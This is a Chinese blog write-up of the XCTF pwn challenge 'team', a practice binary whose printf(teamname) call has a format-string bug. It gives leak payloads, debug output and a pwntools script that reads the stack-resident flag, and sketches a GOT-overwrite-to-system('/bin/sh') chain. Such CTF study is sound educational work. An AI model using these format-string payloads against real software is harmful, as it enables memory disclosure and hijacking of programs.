team [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列28(网站配置错误,需自行配置本地环境测试)

最新推荐文章于 2023-03-08 20:40:43 发布
最新推荐文章于 2023-03-08 20:40:43 发布
阅读量1.6k 收藏
点赞数 1
分类专栏: XCTF-PWN CTF 文章标签: 攻防世界 ctf xctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/103834454
版权
CTF 同时被 2 个专栏收录
46 篇文章 4 订阅
订阅专栏
XCTF-PWN
28 篇文章 10 订阅
订阅专栏

请注意:本题在攻防世界网站配置错误,请自行配置本地环境测试

最近攻防世界的题目pwn高手进阶区全部打乱了,所以现在我的题目列表是下面这样的了,搞的我的尴尬症都犯了😄

准备看看能不能把一些题目解决一下,不过其中有些题目的环境是配置错误的,我已经联系网站的工作人员,准备进QQ群。

现在我就先把team这道题目给大家说明一下。这道题目其实并不是太复杂,但是网站的工作人员没有搞清楚这道题目的出题方法,所以造成了一些问题。

先看看题目:

 现在这道题目改成了2星的难度,其实也确实就是2星的难度。

照例检查一下保护机制

[*] '/ctf/work/python/team/4f785d9988ce43c2b6e12ae2c49040aa'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

开启了NX和Canary,继续看下代码

main函数:

int __cdecl main()
{
  char *pszTeamname; // ST18_4
  char *pszFlag; // ST1C_4

  pszTeamname = (char *)malloc(200u);
  pszFlag = (char *)malloc(100u);
  printf("Enter teamname: ");
  fflush(stdout);
  __isoc99_scanf("%200s", pszTeamname);
  printf("Enter flag: ");
  fflush(stdout);
  __isoc99_scanf("%100s", pszFlag);
  sleep(2u);
  sub_80486AD(pszTeamname, pszFlag);
  free(pszTeamname);
  free(pszFlag);
  return 0;
}

 子函数:

signed int __cdecl sub_80486AD(const char *pszTeamname, const char *pszFlag)
{
  FILE *stream; // [esp+24h] [ebp-74h]
  char s; // [esp+28h] [ebp-70h]
  unsigned int v5; // [esp+8Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  stream = fopen("flag.txt", "r");
  if ( !stream )
    return 1;
  fgets(&s, 100, stream);
  printf(pszTeamname);
  if ( !strcmp(&s, pszFlag) )
    puts(" : correct flag!");
  else
    puts(" : incorrect flag. Try again.");
  fclose(stream);
  return 0;
}

可以非常清楚的看到有个格式化字符串漏洞

printf(pszTeamname);

但是这个漏洞和普通的格式化字符串漏洞不一样,因为它打印的是malloc分配的地址,而不是栈上的地址。

所以我们按照之前的payload

AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.

这样的形式是打印不出来41414141的,因为AAAA保存在heap里面,而打印出来的是栈里面的内容。

划重点

 这个题目出问题的原因在于:服务器上没有flag.txt文件

 而本题的出题者的想法:不是要拿到服务器的shell,而是直接把flag.txt文件的flag读取,打印出来。

我在本地创建了一个flag.txt文件

root@mypwn:/ctf/work/python/team# ls -l
total 2280
-rwxr-xr-x 1 root root    5576 Jan  3 17:31 4f785d9988ce43c2b6e12ae2c49040aa
-rw-r--r-- 1 root root  156577 Jan  4 08:20 4f785d9988ce43c2b6e12ae2c49040aa.idb
-rw------- 1 root root 2424832 Jan  4 07:46 core
-rw-r--r-- 1 root root      16 Jan  4 01:39 flag.txt
-rw-r--r-- 1 root root    1107 Jan  4 07:56 team.py

看下本地的flag.txt的内容

root@mypwn:/ctf/work/python/team# cat flag.txt 
bbbcccdddeeefff
root@mypwn:/ctf/work/python/team#

然后我们按照之前的payload

AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.

看下输出的内容:

[DEBUG] Received 0x1cc bytes:
    'AAAA64.82206c0.c.f7715e89.1.821f230.821f160.0.82206c0.63626262.64646363.65656564.a666666.f7707400.1.1.7fffffff.ff8d8b94.f75e10a5.ff8d8b94.ff8d8b94.ff8d8bb8.f7585c2d.f76fa5c0.f752e0e8.0.ffffffb4.f771af49.2.0.ea6a7d00.ff8d8be8.f7720e20.f76fb89c.ea6a7d00.f76fa000.0.ff8d8be8.804880c.821f160.821f230.ff8d8c8c.f75526a5.f771b9b0.0.821f160.821f230.f76fa000.f76fa000.0.f753ae81.1.ff8d8c84.ff8d8c8c.ff8d8c14.1.0.f76fa000.f771b75a.f7733000. : incorrect flag. Try again.\n'

注意到上面第十个打印项开始

63626262.64646363.65656564.a666666

如果把他们从ascii码翻译成字符其实就是flag.txt的内容:bbbcccdddeeefff

踩坑

按照普通的格式化字符串漏洞应该是下面这样的步骤:

  1. 写free的got表为main函数
  2. 泄漏libc地址
  3. 写free的got表为system函数
  4. 写pszFlag为'/bin/sh'

但是不可以!!呵呵

我顺便做了一个python的脚本,当然只能在本地测试

#coding:utf8
#!python
 
from pwn import *
 
context.log_level = 'debug'
process_name = '4f785d9988ce43c2b6e12ae2c49040aa'


def get_flag(num):
	p = process([process_name], env={'LD_LIBRARY_PATH':'./'})
	# p = remote('111.198.29.45', 39479)
	# elf = ELF(process_name)

	# payload = 'A'*4+'%x.'*60
	# param_num = 10 + (0x70-0xc)/4
	param_num = num
	payload = '%'+str(param_num)+'$p'
	p.sendlineafter('Enter teamname: ', payload)
	p.sendlineafter('Enter flag: ', 'B'*3)
	data = p.recvuntil(' :')[2:-2]
	
	data = data.rjust(8, '0').decode('hex')[::-1]
	log.info("data => %s", data)
	p.close()
	return data


flag = ''
try:
	for x in xrange(10,30):
		flag += get_flag(x)
		if ('\n' in flag) or ('\x00' in flag):
			break;
except Exception as e:
	log.info("flag => %s", flag)

print(flag)

 

3riC5r
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[攻防世界]-welpwn
m0_55906008的博客
12-05 563
pwn
CTF总结-PWN篇
qq_42747131的博客
05-14 6883
一、通用过程 通过file指令查看二制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲溢出攻击 寻找可以行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
CTF中pwn的入门指南
信息安全专题
10-21 6956
CTF中pwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就要对程序行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更要专业的技能和知识,最主要的是要学会如何分析程序,这就要有足够的准备 c语言 汇编语言 python 操作系统 linux操作   C语言是最基础的,当下的比赛大部分的pwn题目使用
PWN 题文件无法运行,好好回去学linux基础。
weixin_45971758的博客
08-19 489
在Ubuntu系统,有些程序无法运行,没有执行权限,无法运行。 报错: bash: ./22e2d7579d2d4359a5a1735edddef631: Permission denied 1.chmod 777 ./xxxxx 查看权限 : ls -al 给予文件最高权限,chmod 777 ./xxxxxx 2.或者文件右键,把这个勾上 ...
部署ctf pwn题目的时候遇到的坑+经验总结
weixin_46521144的博客
10-14 2980
前言 还是第一次部署pwn题目,这次一共使用了两个项目一个是ctfd,另一个是ctf-xinetd。重点大概记录一下两个东西咋用。 ctfd 编辑首页部分 目录栏里面的page xinetd 部署题目 在bin目录下放好binary和flag(或者flag.txt以及其他的,用户ls之后就能看到这个文件夹的内容) 修改ctf.xinetd文件中如下图所示的部分为可执行文件名称,也就是pwn题目的binary文件 启动docker,使用的命令就是README中的 sudo docker build -
【XCTF-RE】新手练习-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
【XCTF-RE】新手练习-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
【XCTF-Mobile】新手练习-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
【XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
【XCTF-Mobile】新手练习-11-你是谁.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5096&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/who_r_u
攻防世界高手 ——Welpwn
weixin_62675330的博客
03-21 853
攻防世界高手 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
攻防世界welpwn
weixin_56777139的博客
03-08 197
攻防世界welpwn
buuojCTF [WUSTCTF2020]level11
kevinhezhuzhu的博客
05-20 249
下载文件发现有两个文件,其中有一个txt文件,里面有一些数字。 不知道是啥,把另一个文件拖ida,很容易找到main函数。 int __cdecl main(int argc, const char **argv, const char **envp) { FILE *stream; // ST08_8@1 int result; // eax@7 __int64 v5; // rcx@7 signed int i; // [sp+4h] [bp-2Ch]@1 char pt
[WUSTCTF2020]level1 题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-10 5611
buuctf-[WUSTCTF2020]level1 题解
攻防世界 Pwn welpwn
MrTreebook的博客
12-25 2506
攻防世界 Pwn welpwn1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary 没有PIE 3.IDA分析 main函数中有一个可以输入的地方,但是不能溢出 接着往下看 在eho函数中,缓冲至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到一个特殊的gadget,它就是破题的关键 我们
攻防世界-PWN-Exercise-Wirteup
07-27 1806
目录 hello_pwn hello_pwn 用ida打开查看源码: 接收最长16个字节,如果dword_60106C = 特定值 则执行sub_400686 这个函数是打印flag 构造payload使得第4个字节开始的数据转换成dword为特定值即可: from pwn import * r = remote("220.249.52.133",37341) payload="aaaa"+p32(0x6E756161) r.send(payload) r.interactive(.
【PWN系列】攻防世界pwnwelpwn分析
Vicl1fe的博客
10-11 461
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 分析 下载文件直接拖入ida分析。开了NX保护,一般就是rop 函数代码也比较简单。read那里也不存溢出。都是0x400。 紧接着调用了echo函数。 在echo函数中,将大小为0x400的buf中的值复制给大小为0x10的s2,。很明显会造成溢出。唯一的问题就是,如果Buf中含有\x00。会中断循环。 函数运行的整体流程就是,用户输入的字符串会存放到buf中,在echo函数中,将buf复制到s2时造成了溢出。通过循
攻防世界pwn高手 exp
qq_40390383的博客
09-12 694
dice_game from pwn import * from ctypes import * lo = remote('220.249.52.133',45069) #lo = process('./dice_game') lib = cdll.LoadLibrary("libc.so.6") lib.srand(1) #定义种子的值为1 #for i in range(50): # num = lib.rand()%6 + 1 # print num payload = 'a'*(0x50-0
攻防世界pwn新手题答案
最新发布
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值